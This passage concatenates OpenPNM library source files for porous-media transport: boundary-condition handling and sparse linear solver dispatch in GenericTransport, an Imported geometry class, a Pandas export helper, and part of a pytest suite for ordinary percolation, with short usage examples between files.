+-------------+--------------------------------------------------+
bcvalues : int or array_like
The boundary value to apply, such as concentration or rate. If
a single value is given, it's assumed to apply to all locations.
Different values can be applied to all pores in the form of an
array of the same length as ``pores``.
mode : string, optional
Controls how the boundary conditions are applied. Options are:
+-------------+--------------------------------------------------+
| 'merge' | (Default) Adds supplied boundary conditions to |
| | already existing conditions |
+-------------+--------------------------------------------------+
| 'overwrite' | Deletes all boundary condition on object then |
| | adds the given ones |
+-------------+--------------------------------------------------+
Notes
-----
It is not possible to have multiple boundary conditions for a
specified location in one algorithm. Use ``remove_BC`` to
clear existing BCs before applying new ones or ``mode='overwrite'``
which removes all existing BC's before applying the new ones.
"""
# Hijack the parse_mode function to verify bctype argument
bctype = self._parse_mode(bctype, allowed=['value', 'rate'],
single=True)
mode = self._parse_mode(mode, allowed=['merge', 'overwrite'],
single=True)
pores = self._parse_indices(pores)
values = np.array(bcvalues)
if values.size > 1 and values.size != pores.size:
raise Exception('The number of boundary values must match the '
+ 'number of locations')
# Warn the user that another boundary condition already exists
value_BC_mask = np.isfinite(self["pore.bc_value"])
rate_BC_mask = np.isfinite(self["pore.bc_rate"])
BC_locs = self.Ps[rate_BC_mask + value_BC_mask]
if np.intersect1d(pores, BC_locs).size:
logger.info('Another boundary condition detected in some locations!')
# Store boundary values
if ('pore.bc_' + bctype not in self.keys()) or (mode == 'overwrite'):
self['pore.bc_' + bctype] = np.nan
if bctype == 'value':
self['pore.bc_' + bctype][pores] = values
if bctype == 'rate':
# Preserve already-assigned rate BCs
bc_rate_current = self.Ps[rate_BC_mask]
intersect = np.intersect1d(bc_rate_current, pores)
self['pore.bc_' + bctype][intersect] += values
# Assign rate BCs to those without previously assigned values
self['pore.bc_' + bctype][np.setdiff1d(pores, intersect)] = values
def remove_BC(self, pores=None, bctype='all'):
r"""
Removes boundary conditions from the specified pores
Parameters
----------
pores : array_like, optional
The pores from which boundary conditions are to be removed. If no
pores are specified, then BCs are removed from all pores. No error
is thrown if the provided pores do not have any BCs assigned.
bctype : string, or list of strings
Specifies which type of boundary condition to remove. Options are:
-*'all'*: (default) Removes all boundary conditions
-*'value'*: Removes only value conditions
-*'rate'*: Removes only rate conditions
"""
if isinstance(bctype, str):
bctype = [bctype]
if 'all' in bctype:
bctype = ['value', 'rate']
if pores is None:
pores = self.Ps
if ('pore.bc_value' in self.keys()) and ('value' in bctype):
self['pore.bc_value'][pores] = np.nan
if ('pore.bc_rate' in self.keys()) and ('rate' in bctype):
self['pore.bc_rate'][pores] = np.nan
def _build_A(self):
r"""
Builds the coefficient matrix based on conductances between pores.
The conductance to use is specified in the algorithm's ``settings``
under ``conductance``. In subclasses (e.g. ``FickianDiffusion``)
this is set by default, though it can be overwritten.
"""
cache_A = self.settings['cache_A']
gvals = self.settings['conductance']
if not gvals:
raise Exception('conductance has not been defined on this algorithm')
if not cache_A:
self._pure_A = None
if self._pure_A is None:
network = self.project.network
phase = self.project.phases()[self.settings['phase']]
g = phase[gvals]
am = network.create_adjacency_matrix(weights=g, fmt='coo')
self._pure_A = spgr.laplacian(am).astype(float)
self.A = self._pure_A.copy()
def _build_b(self):
r"""
Builds the RHS matrix, without applying any boundary conditions or
source terms. This method is trivial and basically creates a column
vector of 0's.
Whether a cached version of b is reused is controlled by the ``cache_b``
setting; the cached version is *clean* in the sense that no boundary
conditions or source terms have been added to it.
"""
cache_b = self.settings['cache_b']
if not cache_b:
self._pure_b = None
if self._pure_b is None:
b = np.zeros(shape=self.Np, dtype=float) # Create vector of 0s
self._pure_b = b
self.b = self._pure_b.copy()
def _get_A(self):
if self._A is None:
self._build_A()
return self._A
def _set_A(self, A):
self._A = A
A = property(fget=_get_A, fset=_set_A)
def _get_b(self):
if self._b is None:
self._build_b()
return self._b
def _set_b(self, b):
self._b = b
b = property(fget=_get_b, fset=_set_b)
def _apply_BCs(self):
r"""
Applies all the boundary conditions that have been specified, by
adding values to the *A* and *b* matrices.
"""
if 'pore.bc_rate' in self.keys():
# Update b
ind = np.isfinite(self['pore.bc_rate'])
self.b[ind] = self['pore.bc_rate'][ind]
if 'pore.bc_value' in self.keys():
f = self.A.diagonal().mean()
# Update b (impose bc values)
ind = np.isfinite(self['pore.bc_value'])
self.b[ind] = self['pore.bc_value'][ind] * f
# Update b (subtract quantities from b to keep A symmetric)
x_BC = np.zeros_like(self.b)
x_BC[ind] = self['pore.bc_value'][ind]
self.b[~ind] -= (self.A.tocsr() * x_BC)[~ind]
# Update A
P_bc = self.toindices(ind)
indrow = np.isin(self.A.row, P_bc)
indcol = np.isin(self.A.col, P_bc)
self.A.data[indrow] = 0 # Remove entries from A for all BC rows
self.A.data[indcol] = 0 # Remove entries from A for all BC cols
datadiag = self.A.diagonal() # Add diagonal entries back into A
datadiag[P_bc] = np.ones_like(P_bc, dtype=float) * f
self.A.setdiag(datadiag)
self.A.eliminate_zeros() # Remove 0 entries
def run(self, x0=None):
r"""
Builds the A and b matrices, and calls the solver specified in the
``settings`` attribute.
Parameters
----------
x0 : ND-array
Initial guess of unknown variable
Returns
-------
Nothing is returned...the solution is stored on the object under
``pore.quantity`` where *quantity* is specified in the ``settings``
attribute.
"""
logger.info('―' * 80)
logger.info('Running GenericTransport')
self._run_generic(x0)
def _run_generic(self, x0):
# (Re)build A,b in case phase/physics are updated and alg.run()
# is to be called a second time
self._build_A()
self._build_b()
self._apply_BCs()
if x0 is None:
x0 = np.zeros(self.Np, dtype=float)
quantity = self.settings['quantity']
if not quantity:
raise Exception('quantity has not been defined on this algorithm')
x_new = self._solve(x0=x0)
self[quantity] = x_new
def _solve(self, A=None, b=None, x0=None):
r"""
Sends the A and b matrices to the specified solver, and solves for *x*
given the boundary conditions, and source terms based on the present
value of *x*. This method does NOT iterate to solve for non-linear
source terms or march time steps.
Parameters
----------
A : sparse matrix
The coefficient matrix in sparse format. If not specified, then
it uses the ``A`` matrix attached to the object.
b : ND-array
The RHS matrix in any format. If not specified, then it uses
the ``b`` matrix attached to the object.
x0 : ND-array
The initial guess for the solution of Ax = b
Notes
-----
The solver used here is specified in the ``settings`` attribute of the
algorithm.
"""
# Fetch A and b from self if not given, and throw error if not found
A = self.A if A is None else A
b = self.b if b is None else b
if A is None or b is None:
raise Exception('The A matrix or the b vector has not been built yet.')
A = A.tocsr()
x0 = np.zeros_like(b) if x0 is None else x0
# Check if A and b are well-defined
self._check_for_nans()
# Raise error if solver_family not available
if self.settings["solver_family"] not in ["scipy", "petsc", "pyamg"]:
raise Exception(f"{self.settings['solver_family']} not available.")
# Set tolerance for iterative solvers
tol = self.settings["solver_tol"]
max_it = self.settings["solver_maxiter"]
atol = self._get_atol()
rtol = self._get_rtol(x0=x0)
# Check if A is symmetric
is_sym = op.utils.is_symmetric(self.A)
if self.settings['solver_type'] == 'cg' and not is_sym:
raise Exception('CG solver only works on symmetric matrices.')
# SciPy
if self.settings['solver_family'] == 'scipy':
# Umfpack by default uses its 32-bit build -> memory overflow
try:
import scikits.umfpack
A.indices = A.indices.astype(np.int64)
A.indptr = A.indptr.astype(np.int64)
except ModuleNotFoundError:
pass
solver = getattr(scipy.sparse.linalg, self.settings['solver_type'])
iterative = ['bicg', 'bicgstab', 'cg', 'cgs', 'gmres', 'lgmres',
'minres', 'gcrotmk', 'qmr']
if solver.__name__ in iterative:
x, exit_code = solver(A=A, b=b, atol=atol, tol=tol, maxiter=max_it, x0=x0)
if exit_code > 0:
raise Exception(f'Solver did not converge, exit code: {exit_code}')
else:
x = solver(A=A, b=b)
# PETSc
if self.settings['solver_family'] == 'petsc':
# Check if petsc is available
try:
import petsc4py
from openpnm.utils.petsc import PETScSparseLinearSolver as SLS
except Exception:
raise ModuleNotFoundError('PETSc is not installed.')
temp = {"type": self.settings["solver_type"],
"preconditioner": self.settings["solver_preconditioner"]}
ls = SLS(A=A, b=b, settings=temp)
x = ls.solve(x0=x0, atol=atol, rtol=rtol, max_it=max_it)
# PyAMG
if self.settings['solver_family'] == 'pyamg':
# Check if PyAMG is available
try:
import pyamg
except Exception:
raise ModuleNotFoundError('PyAMG is not installed.')
ml = pyamg.ruge_stuben_solver(A)
x = ml.solve(b=b, tol=rtol, maxiter=max_it)
return x
def _get_atol(self):
r"""
Fetches absolute tolerance for the solver if not ``None``, otherwise
calculates it in a way that meets the given ``tol`` requirements.
``atol`` is defined such to satisfy the following stopping criterion:
``norm(A*x-b)`` <= ``atol``
"""
atol = self.settings["solver_atol"]
if atol is None:
tol = self.settings["solver_tol"]
atol = norm(self.b) * tol
return atol
def _get_rtol(self, x0):
r"""
Fetches relative tolerance for the solver if not ``None``, otherwise
calculates it in a way that meets the given ``tol`` requirements.
``rtol`` is defined based on the following formula:
``rtol = residual(@x_final) / residual(@x0)``
"""
rtol = self.settings["solver_rtol"]
if rtol is None:
res0 = self._get_residual(x=x0)
atol = self._get_atol()
rtol = atol / res0
return rtol
def _check_for_nans(self):
r"""
Check whether A and b are well-defined, i.e. they do not contain NaNs.
"""
# Return if everything looks good
if not np.isnan(self.A.data).any():
if not np.isnan(self.b).any():
return
import networkx as nx
from pandas import unique
# Fetch phase/geometries/physics
prj = self.network.project
phase = prj.find_phase(self)
geometries = prj.geometries().values()
physics = prj.physics().values()
# Locate the root of NaNs
unaccounted_nans = []
for geom, phys in zip(geometries, physics):
objs = [phase, geom, phys]
# Generate global dependency graph
dg = nx.compose_all([x.models.dependency_graph(deep=True) for x in objs])
d = {} # maps prop -> obj.name
for obj in objs:
for k, v in obj.check_data_health().items():
if "Has NaNs" in v:
# FIXME: The next line doesn't cover multi-level props
base_prop = ".".join(k.split(".")[:2])
if base_prop in dg.nodes:
d[base_prop] = obj.name
else:
unaccounted_nans.append(base_prop)
# Generate dependency subgraph for props with NaNs
dg_nans = nx.subgraph(dg, d.keys())
# Find prop(s)/object(s) from which NaNs have propagated
root_props = [n for n in d.keys() if not nx.ancestors(dg_nans, n)]
root_objs = unique([d[x] for x in nx.topological_sort(dg_nans)])
# Throw error with helpful info on how to resolve the issue
if root_props:
msg = (
f"Found NaNs in A matrix, possibly caused by NaNs in "
f"{', '.join(root_props)}. The issue might get "
f"resolved if you call regenerate_models on the following "
f"object(s): {', '.join(root_objs)}"
)
raise Exception(msg)
# Raise Exception otherwise
if unaccounted_nans:
raise Exception(f"Found NaNs in A matrix, possibly caused by NaNs in "
f"{', '.join(unaccounted_nans)}.")
def results(self):
r"""
Fetches the calculated quantity from the algorithm and returns it as
an array.
"""
quantity = self.settings['quantity']
d = {quantity: self[quantity]}
return d
def rate(self, pores=[], throats=[], mode='group'):
r"""
Calculates the net rate of material moving into a given set of pores or
throats
Parameters
----------
pores : array_like
The pores for which the rate should be calculated
throats : array_like
The throats through which the rate should be calculated
mode : string, optional
Controls how to return the rate. Options are:
*'group'*: (default) Returns the cumulative rate of material
moving into the given set of pores
*'single'* : Calculates the rate for each pore individually
Returns
-------
If ``pores`` are specified, then the returned values indicate the
net rate of material exiting the pore or pores. Thus a positive
rate indicates material is leaving the pores, and negative values
mean material is entering.
If ``throats`` are specified the rate is calculated in the direction of
the gradient, thus is always positive.
If ``mode`` is 'single' the rate through each of the given pores (or
throats) is returned as a vector; if ``mode`` is 'group' the individual
rates are summed and returned as a scalar.
"""
pores = self._parse_indices(pores)
throats = self._parse_indices(throats)
network = self.project.network
phase = self.project.phases()[self.settings['phase']]
g = phase[self.settings['conductance']]
quantity = self[self.settings['quantity']]
P12 = network['throat.conns']
X12 = quantity[P12]
if g.size == self.Nt:
g = np.tile(g, (2, 1)).T # Make conductance a Nt by 2 matrix
# The next line is critical for rates to be correct
g = np.flip(g, axis=1)
Qt = np.diff(g*X12, axis=1).squeeze()
if len(throats) and len(pores):
raise Exception('Must specify either pores or throats, not both')
if len(throats) == 0 and len(pores) == 0:
raise Exception('Must specify either pores or throats')
elif len(throats):
R = np.absolute(Qt[throats])
if mode == 'group':
R = np.sum(R)
elif len(pores):
Qp = np.zeros((self.Np, ))
np.add.at(Qp, P12[:, 0], -Qt)
np.add.at(Qp, P12[:, 1], Qt)
R = Qp[pores]
if mode == 'group':
R = np.sum(R)
return np.array(R, ndmin=1)
def set_solver(
self,
solver_family=None,
solver_type=None,
preconditioner=None,
tol=None,
atol=None,
rtol=None,
maxiter=None,
):
r"""
Set the solver to be used to solve the algorithm.
The values of those fields that are not provided will be retrieved from
algorithm settings dict.
Parameters
----------
solver_family : string, optional
Solver family, could be "scipy", "petsc", and "pyamg".
solver_type : string, optional
Solver type, could be "spsolve", "cg", "gmres", etc.
preconditioner : string, optional
Preconditioner for iterative solvers. The default is "jacobi".
tol : float, optional
Tolerance for iterative solvers, loosely related to number of
significant digits in data.
atol : float, optional
Absolute tolerance for iterative solvers, such that
norm(Ax-b) <= atol holds.
rtol : float, optional
Relative tolerance for iterative solvers, loosely related to how
many orders of magnitude reduction in residual is desired, compared
to its value at initial guess.
Returns
-------
None.
"""
settings = self.settings
# Preserve pre-set values, if any
if solver_family is None:
solver_family = settings["solver_family"]
if solver_type is None:
solver_type = settings["solver_type"]
if preconditioner is None:
preconditioner = settings["solver_preconditioner"]
if tol is None:
tol = settings["solver_tol"]
if atol is None:
atol = settings["solver_atol"]
if rtol is None:
rtol = settings["solver_rtol"]
if maxiter is None:
maxiter = settings["solver_maxiter"]
# Update settings on algorithm object
self.settings.update(
{
"solver_family": solver_family,
"solver_type": solver_type,
"solver_preconditioner": preconditioner,
"solver_tol": tol,
"solver_atol": atol,
"solver_rtol": rtol,
"solver_maxiter": maxiter
}
)
def _get_residual(self, x=None):
r"""
Calculate solution residual based on the given ``x`` based on the
following formula:
``res = norm(A*x - b)``
"""
if x is None:
quantity = self.settings['quantity']
x = self[quantity]
return norm(self.A * x - self.b)
def _calc_eff_prop(self, inlets=None, outlets=None,
domain_area=None, domain_length=None):
r"""
Calculate the effective transport through the network
Parameters
----------
inlets : array_like
The pores where the inlet boundary conditions were applied. If
not given an attempt is made to infer them from the algorithm.
outlets : array_like
The pores where the outlet boundary conditions were applied. If
not given an attempt is made to infer them from the algorithm.
domain_area : scalar
The area of the inlet and/or outlet face (which should match)
domain_length : scalar
The length of the domain between the inlet and outlet faces
Returns
-------
The effective transport property through the network
"""
if self.settings['quantity'] not in self.keys():
raise Exception('The algorithm has not been run yet. Cannot '
+ 'calculate effective property.')
Ps = np.isfinite(self['pore.bc_value'])
BCs = np.unique(self['pore.bc_value'][Ps])
Dx = np.abs(np.diff(BCs))
if inlets is None:
inlets = self._get_inlets()
flow = self.rate(pores=inlets)
# Fetch area and length of domain
if domain_area is None:
domain_area = self._get_domain_area(inlets=inlets,
outlets=outlets)
if domain_length is None:
domain_length = self._get_domain_length(inlets=inlets,
outlets=outlets)
D = np.sum(flow)*domain_length/domain_area/Dx
return D
def _get_inlets(self):
# Determine boundary conditions by analyzing algorithm object
Ps = np.isfinite(self['pore.bc_value'])
BCs = np.unique(self['pore.bc_value'][Ps])
inlets = np.where(self['pore.bc_value'] == np.amax(BCs))[0]
return inlets
def _get_outlets(self):
# Determine boundary conditions by analyzing algorithm object
Ps = np.isfinite(self['pore.bc_value'])
BCs = np.unique(self['pore.bc_value'][Ps])
outlets = np.where(self['pore.bc_value'] == np.amin(BCs))[0]
return outlets
def _get_domain_area(self, inlets=None, outlets=None):
logger.warning('Attempting to estimate inlet area...will be low')
network = self.project.network
# Abort if network is not 3D
if np.sum(np.ptp(network['pore.coords'], axis=0) == 0) > 0:
raise Exception('The network is not 3D, specify area manually')
if inlets is None:
inlets = self._get_inlets()
if outlets is None:
outlets = self._get_outlets()
inlets = network['pore.coords'][inlets]
outlets = network['pore.coords'][outlets]
if not iscoplanar(inlets):
logger.error('Detected inlet pores are not coplanar')
if not iscoplanar(outlets):
logger.error('Detected outlet pores are not coplanar')
Nin = np.ptp(inlets, axis=0) > 0
if Nin.all():
logger.warning('Detected inlets are not oriented along a '
+ 'principal axis')
Nout = np.ptp(outlets, axis=0) > 0
if Nout.all():
logger.warning('Detected outlets are not oriented along a '
+ 'principal axis')
hull_in = ConvexHull(points=inlets[:, Nin])
hull_out = ConvexHull(points=outlets[:, Nout])
if hull_in.volume != hull_out.volume:
logger.error('Inlet and outlet faces are different area')
area = hull_in.volume # In 2D volume=area, area=perimeter
return area
def _get_domain_length(self, inlets=None, outlets=None):
logger.warning('Attempting to estimate domain length...'
+ 'could be low if boundary pores were not added')
network = self.project.network
if inlets is None:
inlets = self._get_inlets()
if outlets is None:
outlets = self._get_outlets()
inlets = network['pore.coords'][inlets]
outlets = network['pore.coords'][outlets]
if not iscoplanar(inlets):
logger.error('Detected inlet pores are not coplanar')
if not iscoplanar(outlets):
logger.error('Detected outlet pores are not coplanar')
tree = cKDTree(data=inlets)
Ls = np.unique(np.float64(tree.query(x=outlets)[0]))
if not np.allclose(Ls, Ls[0]):
logger.error('A unique value of length could not be found')
length = Ls[0]
return length
```
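To show how the boundary-condition and solver machinery above is normally driven, here is a hedged end-to-end sketch. It assumes the standard OpenPNM 2.x helper classes (``Cubic``, ``StickAndBall``, ``Water``, ``Standard``, ``FickianDiffusion``) are available; ``FickianDiffusion`` is the ``GenericTransport`` subclass mentioned in the ``_build_A`` docstring and presets ``quantity`` and ``conductance``.
```python
import openpnm as op

pn = op.network.Cubic(shape=[10, 10, 10], spacing=1e-4)
geo = op.geometry.StickAndBall(network=pn, pores=pn.Ps, throats=pn.Ts)
water = op.phases.Water(network=pn)
phys = op.physics.Standard(network=pn, phase=water, geometry=geo)

alg = op.algorithms.FickianDiffusion(network=pn, phase=water)
alg.set_value_BC(pores=pn.pores('left'), values=1.0)    # Dirichlet inlet
alg.set_value_BC(pores=pn.pores('right'), values=0.0)   # Dirichlet outlet
alg.set_solver(solver_family='scipy', solver_type='spsolve')
alg.run()

conc = alg['pore.concentration']           # 'pore.concentration' is assumed to be
                                           # the default quantity of FickianDiffusion
r_in = alg.rate(pores=pn.pores('left'))    # net rate through the inlet face
print(conc.mean(), r_in)
```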
#### File: openpnm/geometry/Imported.py
```python
import openpnm.models as mods
from openpnm.geometry import GenericGeometry
from openpnm.utils import logging, GenericSettings
logger = logging.getLogger(__name__)
class ImportedSettings(GenericSettings):
r"""
Parameters
----------
pore_diameter : str (default = 'pore.extended_diameter')
Key into the extracted data array to use as pore diameter in other
geometry calculations. Use of the 'pore.' prefix is not required.
throat_diameter : str (default = 'throat.equivalent_diameter')
Key into the extracted data array to use as throat diameter in other
geometry calculations. Use of 'throat.' is not required.
pore_shape : string {'sphere' (default), 'cube'}
Specifies which shape to assume when calculating dependent properties
such as volume and surface area.
throat_shape : string {'cylinder' (default), 'cuboid'}
Specifies which shape to assume when calculating dependent properties
such as volume and surface area.
"""
pore_diameter = 'pore.extended_diameter'
throat_diameter = 'throat.equivalent_diameter'
pore_shape = 'sphere'
throat_shape = 'cylinder'
class Imported(GenericGeometry):
r"""
This geometry class extracts all numerical properties from the received
network object and moves them to itself.
This class is intended for use with networks imported from network
extraction codes, where the geometry properties are included on the
network itself.
Parameters
----------
network : OpenPNM Network object
The network with which this Geometry should be associated
exclude : list of strings
A list of which network properties should *not* be transferred to
new geometry object. 'pore.coords' and 'throat.conns' are *always*
excluded. Note that labels are not transferred, only properties.
project : OpenPNM Project object, optional
Can be supplied in addition to ``network`` but is inferred from the
network's project if not given.
name : string
The name of the object, which is also used as the label where this
geometry is defined.
Notes
-----
An error occurs when adding other geometries to a network that has
geometrical properties such as 'pore.diameter'. This can occur when
adding boundary pores or in more elaborate scenarios such as stitching
networks together. The issue arises because OpenPNM prevents a property,
such as 'pore.volume', from existing on both the network and also a
geometry. Thus it is necessary to move the extracted network properties
to this ``Imported`` class, then create new geometry objects for any
added pores as needed.
"""
def __init__(self, network, exclude=[], settings={}, **kwargs):
self.settings._update_settings_and_docs(ImportedSettings())
self.settings.update(settings)
super().__init__(network=network, **kwargs)
# Transfer all geometrical properties off of network
exclude.extend(['pore.coords', 'throat.conns'])
for item in network.props():
if item not in exclude:
self[item] = network.pop(item)
# If the following 'essential' props are not already defined, then
# they should be added using the specified values or models
if 'pore.diameter' not in self.keys():
pdia = 'pore.'+self.settings['pore_diameter'].split('pore.')[-1]
try:
self['pore.diameter'] = self[pdia]
except KeyError:
logger.error(pdia + " not found, can't assign 'pore.diameter'")
if 'pore.volume' not in self.keys():
pore_shape = self.settings['pore_shape']
m = getattr(mods.geometry.pore_volume, pore_shape)
self.add_model(propname='pore.volume',
model=m, pore_diameter='pore.diameter')
if 'pore.area' not in self.keys():
pore_shape = self.settings['pore_shape']
m = getattr(mods.geometry.pore_area, pore_shape)
self.add_model(propname='pore.area',
model=m)
if 'throat.diameter' not in self.keys():
tdia = 'throat.'+self.settings['throat_diameter'].split('throat.')[-1]
try:
self['throat.diameter'] = self[tdia]
except KeyError:
logger.error(tdia + " not found, can't assign 'throat.diameter'")
if 'throat.endpoints' not in self.keys():
self.add_model(propname='throat.endpoints',
model=mods.geometry.throat_endpoints.spherical_pores,
pore_diameter='pore.diameter',
throat_diameter='throat.diameter')
if 'throat.length' not in self.keys():
self.add_model(propname='throat.length',
model=mods.geometry.throat_length.piecewise,
throat_endpoints='throat.endpoints')
if 'throat.volume' not in self.keys():
shape = self.settings['throat_shape']
m = getattr(mods.geometry.throat_volume, shape)
self.add_model(propname='throat.volume',
model=m,
throat_length='throat.length',
throat_diameter='throat.diameter')
if 'throat.conduit_lengths' not in self.keys():
self.add_model(propname='throat.conduit_lengths',
model=mods.geometry.throat_length.conduit_lengths,
throat_endpoints='throat.endpoints',
throat_length='throat.length')
```
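A small, hypothetical sketch of how the ``Imported`` geometry above is used. The network stands in for one produced by a network-extraction code and already carries arrays matching the default names in ``ImportedSettings``; ``Imported`` moves them onto itself and adds models for the dependent properties.
```python
import numpy as np
import openpnm as op

pn = op.network.Cubic(shape=[5, 5, 5], spacing=1e-4)
pn['pore.extended_diameter'] = np.random.rand(pn.Np) * 1e-4      # illustrative data
pn['throat.equivalent_diameter'] = np.random.rand(pn.Nt) * 5e-5  # illustrative data

geo = op.geometry.Imported(network=pn, pores=pn.Ps, throats=pn.Ts)
print('pore.diameter' in geo.keys())   # True: copied from 'pore.extended_diameter'
print(geo.props())                     # dependent props (volume, area, ...) added via models
```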
#### File: openpnm/io/Pandas.py
```python
import numpy as np
import scipy as sp
from flatdict import FlatDict
from collections import namedtuple
from openpnm.io import Dict, GenericIO
from openpnm.utils import sanitize_dict, logging
logger = logging.getLogger(__name__)
class Pandas(GenericIO):
r"""
Combines all data arrays into a Pandas DataFrame object
The structure of a DataFrame is a very close match to OpenPNM's data
storage. Each key becomes a column header in the DataFrame, and each
pore or throat entry becomes a row.
Limitations of the DataFrame are the inability to have multidimensional
data in a single column. The methods on a DataFrame are also oriented
towards time-series data.
Nonetheless, Pandas offers many useful features such as performing
statistical analysis on properties. DataFrames also offer *many* options for
exporting to other file formats, so if a format is not yet supported
by OpenPNM, this could be a solution.
"""
@classmethod
def to_dataframe(cls, network=None, phases=[], join=False, delim=' | '):
r"""
Convert the Network (and optionally Phase) data to Pandas DataFrames.
Parameters
----------
network: OpenPNM Network Object
The network containing the data to be stored
phases : list of OpenPNM Phase Objects
The data on each supplied phase will be added to DataFrame
join : boolean
If ``False`` (default), two DataFrames are returned with *pore*
data in one, and *throat* data in the other. If ``True`` the pore
and throat data are combined into a single DataFrame. This can be
problematic as it will put NaNs into all the *pore* columns which
are shorter than the *throat* columns.
Returns
-------
Pandas ``DataFrame`` object containing property and label data in each
column. If ``join`` was False (default) the two DataFrames are
returned in a named tuple, or else a single DataFrame with pore and
throat data in the same frame, despite the column lengths being
different.
"""
from pandas import DataFrame
project, network, phases = cls._parse_args(network=network,
phases=phases)
# Initialize pore and throat data dictionary using Dict class
pdata = Dict.to_dict(network=network, phases=phases, element='pore',
interleave=True, flatten=True,
categorize_by=['object'])
tdata = Dict.to_dict(network=network, phases=phases, element='throat',
interleave=True, flatten=True,
categorize_by=['object'])
pdata = FlatDict(pdata, delimiter=delim)
tdata = FlatDict(tdata, delimiter=delim)
# Scan data and convert non-1d arrays to multiple columns
for key in list(pdata.keys()):
if np.shape(pdata[key]) != (network[0].Np,):
arr = pdata.pop(key)
tmp = np.split(arr, arr.shape[1], axis=1)
cols = range(len(tmp))
pdata.update({key+'['+str(i)+']': tmp[i].squeeze()
for i in cols})
for key in list(tdata.keys()):
if np.shape(tdata[key]) != (network[0].Nt,):
arr = tdata.pop(key)
tmp = np.split(arr, arr.shape[1], axis=1)
cols = range(len(tmp))
tdata.update({key+'['+str(i)+']': tmp[i].squeeze()
for i in cols})
# Convert sanitized dictionaries to DataFrames
pdata = DataFrame(sanitize_dict(pdata))
tdata = DataFrame(sanitize_dict(tdata))
# Prepare DataFrames to be returned
if join:
data = tdata.join(other=pdata, how='left')
else:
nt = namedtuple('dataframes', ('pore', 'throat'))
data = nt(pore=pdata, throat=tdata)
return data
@classmethod
def from_dataframe(cls):
r"""
"""
raise NotImplementedError()
```
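A brief sketch of the exporter above; it assumes the optional ``pandas`` dependency is installed and reuses the usual OpenPNM example objects.
```python
import openpnm as op

pn = op.network.Cubic(shape=[3, 3, 3])
geo = op.geometry.StickAndBall(network=pn, pores=pn.Ps, throats=pn.Ts)
water = op.phases.Water(network=pn)

# Default: separate pore and throat DataFrames returned in a named tuple
dfs = op.io.Pandas.to_dataframe(network=pn, phases=[water])
print(dfs.pore.shape, dfs.throat.shape)

# join=True: one frame, with the shorter pore columns padded with NaN
df = op.io.Pandas.to_dataframe(network=pn, phases=[water], join=True)
print(df.columns[:5])
```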
#### File: unit/algorithms/OrdinaryPercolationTest.py
```python
import pytest
import numpy as np
import scipy as sp
import openpnm as op
mgr = op.Workspace()
class OrdinaryPercolationTest:
def setup_class(self):
self.net = op.network.Cubic(shape=[5, 5, 5], spacing=0.0005)
self.geo = op.geometry.StickAndBall(network=self.net,
pores=self.net.Ps,
throats=self.net.Ts)
self.water = op.phases.Water(network=self.net)
self.air = op.phases.Air(network=self.net)
self.phys = op.physics.GenericPhysics(network=self.net,
phase=self.water,
geometry=self.geo)
mod = op.models.physics.capillary_pressure.washburn
self.phys.add_model(propname='throat.entry_pressure',
model=mod)
def test_set_inlets_overwrite(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg.set_inlets(pores=self.net.pores('top'))
assert np.sum(self.alg['pore.inlets']) == 25
self.alg.set_inlets(pores=self.net.pores('bottom'))
assert np.sum(self.alg['pore.inlets']) == 50
self.alg.set_inlets(pores=self.net.pores('top'), overwrite=True)
assert np.sum(self.alg['pore.inlets']) == 25
self.alg.set_inlets(pores=[], overwrite=True)
assert np.sum(self.alg['pore.inlets']) == 0
def test_set_inlets_conflicting_with_outlets(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg['pore.outlets'][self.net.pores('top')] = True
with pytest.raises(Exception):
self.alg.set_inlets(pores=self.net.pores('top'))
def test_set_outlets_conflicting_with_inlets(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg['pore.inlets'][self.net.pores('top')] = True
with pytest.raises(Exception):
self.alg.set_outlets(pores=self.net.pores('top'))
def test_set_outlets_without_trapping(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg.set_inlets(pores=self.net.pores('top'))
with pytest.raises(Exception):
self.alg.set_outlets(pores=self.net.pores('top'))
def test_set_outlets_overwrite(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
self.alg.set_outlets(pores=self.net.pores('top'))
assert np.sum(self.alg['pore.outlets']) == 25
self.alg.set_outlets(pores=self.net.pores('bottom'))
assert np.sum(self.alg['pore.outlets']) == 50
self.alg.set_outlets(pores=self.net.pores('top'), overwrite=True)
assert np.sum(self.alg['pore.outlets']) == 25
self.alg.set_outlets(pores=[], overwrite=True)
assert np.sum(self.alg['pore.outlets']) == 0
def test_set_residual_modes(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
Ps = sp.random.randint(0, self.net.Np, 10)
Ts = self.net.find_neighbor_pores(pores=Ps)
self.alg.set_residual(pores=Ps, throats=Ts)
assert np.sum(self.alg['pore.residual']) == np.size(np.unique(Ps))
assert np.sum(self.alg['throat.residual']) == np.size(np.unique(Ts))
Ps = sp.random.randint(0, self.net.Np, 10)
Ts = self.net.find_neighbor_pores(pores=Ps)
self.alg.set_residual(pores=Ps, throats=Ts)
assert np.sum(self.alg['pore.residual']) > np.size(np.unique(Ps))
assert np.sum(self.alg['throat.residual']) > np.size(np.unique(Ts))
Ps = sp.random.randint(0, self.net.Np, 10)
Ts = self.net.find_neighbor_pores(pores=Ps)
self.alg.set_residual(pores=Ps, throats=Ts, overwrite=True)
assert np.sum(self.alg['pore.residual']) == np.size(np.unique(Ps))
assert np.sum(self.alg['throat.residual']) == np.size(np.unique(Ts))
self.alg.set_residual(pores=[], throats=[], overwrite=True)
assert np.sum(self.alg['pore.residual']) == 0
self.alg.set_residual(pores=Ps, throats=Ts)
self.alg.set_residual(overwrite=True)
assert np.sum(self.alg['pore.residual']) == 0
def test_run_npts(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
Ps = sp.random.randint(0, self.net.Np, 10)
self.alg.set_inlets(pores=Ps)
self.alg.run(points=20)
def test_run_inv_pressures(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
Ps = sp.random.randint(0, self.net.Np, 10)
self.alg.set_inlets(pores=Ps)
self.alg.run(points=range(0, 20000, 1000))
def test_run_no_inlets(self):
self.alg = op.algorithms.OrdinaryPercolation(network=self.net)
self.alg.setup(phase=self.water)
